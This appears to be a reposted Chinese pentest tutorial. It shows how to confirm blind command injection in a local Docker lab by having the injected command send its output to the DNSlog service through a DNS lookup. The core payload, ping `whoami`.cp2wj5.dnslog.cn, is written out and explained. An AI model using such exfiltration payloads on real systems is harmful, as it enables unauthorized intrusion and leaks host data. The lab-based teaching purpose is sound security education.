通过DNSLOG回显验证漏洞
通过DNSLOG回显验证漏洞
前言
实际渗透测试中,有些漏洞因为没有回显导致无法准确判断漏洞是否存在,可能导致渗透测试人员浪费大量精力在一个并不存在的漏洞上,因此为了验证一些无回显漏洞,可结合DNSlog平台进行测试,本文使用的DNSlog平台链接如下:http://dnslog.cn/
原理
DNSlog检测原理在此就不多赘述了,网上相关资料铺天盖地,此处引用一张FREEBUF的图用以说明,此图现在看不懂没关系,当做完实验后再返回查看本图思维就会很清晰了。

环境搭建
1. 安装Docker
接下来直接搭建靶场,进入实验环境,本实验使用Docker搭建漏洞环境,操作系统是windows 10,Docker Desktop提供了较为完善的图形化操作界面,且兼容性随着版本更新目前已经与linux下运行的Docker无区别,安装方式见官网,安装操作较为简单,无脑下一步即可,安装完成后需要重启,接着按照说明一步步安装其他必备环境,这里就不再细说了。
2.拉取镜像
- 打开CMD/PowerShell运行以下命令: - docker pull ge592555078/lkwa从仓库拉取镜像
- 接着打开Docker Desktop按照下图操作运行刚才拉取的环境,并将80端口映射到本地的81端口。  
// 或者在命令行中直接输入docker run -d -p 81:80 ge592555078/lkwa
- 此时访问 - http://localhost:81/应当出现apache的默认页面,证明环境搭建完成: 
漏洞复现
由于主要学习dnslog的使用,我们就用环境中命令执行模块复现。
- 访问http://localhost:81/index.php此为漏洞环境的主页
- 左侧选择Bind RCE命令注入环境
- 此时访问dnslog平台:http://dnslog.cn/点击页面上Get SubDomain生成专属子域名

- 回到漏洞环境,在右侧命令执行输入框中输入如下命令之后点击 - submit按钮提交执行。(whoami后应该衔接刚才生成的对应子域名)- ping `whoami`.cp2wj5.dnslog.cn
 
- 再返回DNSlog平台,点击刷新解析记录按钮,可以发现whoami的执行结果已经拼接成四级域名了:  - 至此为止试验结束。 
分析总结
存在无回显漏洞的主机访问DNSlog平台就会留下DNS解析记录,可以通过DNS解析记录查看最终的执行结果,如示例中的语句:
ping `whoami`.cp2wj5.dnslog.cn
此语句实际上是:
ping www-data.yafjqc.dnslog.cn
包围着whoami的符号是反单引号,是shift+~组合打出来的符号,表示执行命令的意思,那么最终ping的结果就是ping whoami执行后的主机名.随机三级域名.dnslog.cn,解析的时候一层一层的迭代解析,最终指向dnslog.cn服务器上你的专属三级域名,并附带上执行结果(四级域名),那么此时看dnslog服务器的DNS解析记录即可查看whoami的执行结果,如果对DNS协议不清楚此时应先去学习DNS解析原理,不然此篇文章学习起来较为吃力。
通过DNSLOG回显验证漏洞的更多相关文章
- 利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
		作者:Armyzer0 Weblogic(CVE-2017-10271) 漏洞出来以后又是一波血雨腥风,正好我昨天测试的时候发现了一个存在这个漏洞的weblogic,但是他不回显咋办呢!让他返回执行结 ... 
- 巧用DNSlog实现无回显注入
		测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入.具体原理如下 ... 
- 【渗透测试】如何利用burpsuite测试无回显漏洞
		前面的文章讲了在windows和linux上的不同的无文件渗透测试的方法,那么这篇文章给大家讲解如何在漏洞没有回显的情况下,利用burpsuite自带插件进行测试的方式. 首先我们稍微提一下有哪些无回 ... 
- 利用DNSLog实现无回显注入
		测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入 DNSLOG ... 
- 巧用DNSlog实现无回显注入【转载】
		原作者:afanti 原出处:https://www.cnblogs.com/afanti/p/8047530.html 0x00 简介 测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行 ... 
- Java反序列化漏洞执行命令回显实现及Exploit下载
		原文地址:http://www.freebuf.com/tools/88908.html 本文原创作者:rebeyond 文中提及的部分技术.工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使 ... 
- EasyUI加zTree使用解析 easyui修改操作的表单回显方法 验证框提交表单前验证  datagrid的load方法
		带参提交一次查询,从服务器加载新数据.这是一个神奇的方法 $('#dg').datagrid('load',{ code: '01', name: 'name01' }); easyui修改操作的回显 ... 
- SpEL表达式注入漏洞学习和回显poc研究
		目录 前言 环境 基础学习和回显实验 语法基础 回显实验 BufferedReader Scanner SpEL漏洞复现 低版本SpringBoot中IllegalStateException CVE ... 
- DVWA中SQL回显注入
		一.SQL注入简介 1.1 SQL语句就是操作数据库的语句,SQL注入就是通过web程序在数据库里执行任意SQL语句. SQL 注入是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问和修改数据, ... 
随机推荐
- golang GMP goroutine调度器
			Goroutine可以动态的伸缩栈的大小,最小2-4kb,最大1GB 
- 百度前端技术学院-基础-day2
			2020.9.15 今天是学习前端基础技术的第二天,今天制作了一个在线简历,纯html的那种.帮助我复习了以前的基础知识,也增加了新的知识点,比如制作列表可以用fieldset来整合数据. 我的在线简 ... 
- 转:什么是Shingling算法
			shingling算法用于计算两个文档的相似度,例如,用于网页去重.维基百科对w-shingling的定义如下: In natural language processing a w-shinglin ... 
- C# WPF开源控件库:MahApps.Metro
			其实站长很久之前就知道这个开源WPF控件库了,只是一直欣赏不了这种风格,但也star了该项目.每次浏览该仓库时,发现star越来越多,也看到很多网友对它的褒奖,所以今天就向大家推荐这款WPF控件库. ... 
- Redis数据持久化(RDB、AOF)
			1. 简介 Redis作为内存型数据库,数据都保存在内存中,如果重启或意外宕机后,数据会全部丢失.因此,Redis提供了完善的持久化机制,将内存中的数据持久化到磁盘上,避免了完整性和安全性的问题, ... 
- iOS10 App适配权限  Push Notifications 字体Frame 遇到的坑!!!!
			添加配置权限 <!-- 相册 --> <key>NSPhotoLibraryUsageDescription</key> <string>"x ... 
- 痞子衡嵌入式:恩智浦i.MX RT1xxx系列MCU硬件那些事(2.5)- 串行NOR Flash下载算法(IAR EWARM篇)
			大家好,我是痞子衡,是正经搞技术的痞子.今天痞子衡给大家介绍的是IAR开发环境下i.MXRT的串行NOR Flash下载算法设计. 在i.MXRT硬件那些事系列之<在串行NOR Flash XI ... 
- js上 十四、对象
			十四.对象 #1.初识对象 什么是对象? 在js中,一切皆是对象. 对象,生活中可见和不可见的东西,在世界中,客观存在的都是一个对象. 桌子,笔记本,手机,人. 在日常生活中,我们是如何来描述这个对象 ... 
- Django 3.x 原生支持websocket 配置
			websocket.py 1 # websocket.py 2 async def websocket_application(scope, receive, send): 3 while True: ... 
- Durid的特点
			Durid的特点 1.为什么会有Durid? 创建Druid的最初意图主要是为了解决查询延迟问题,当时试图使用Hadoop来实现交互式查询分析,但是很难满足实时分析的需要.而Druid提供了以交互方式 ... 
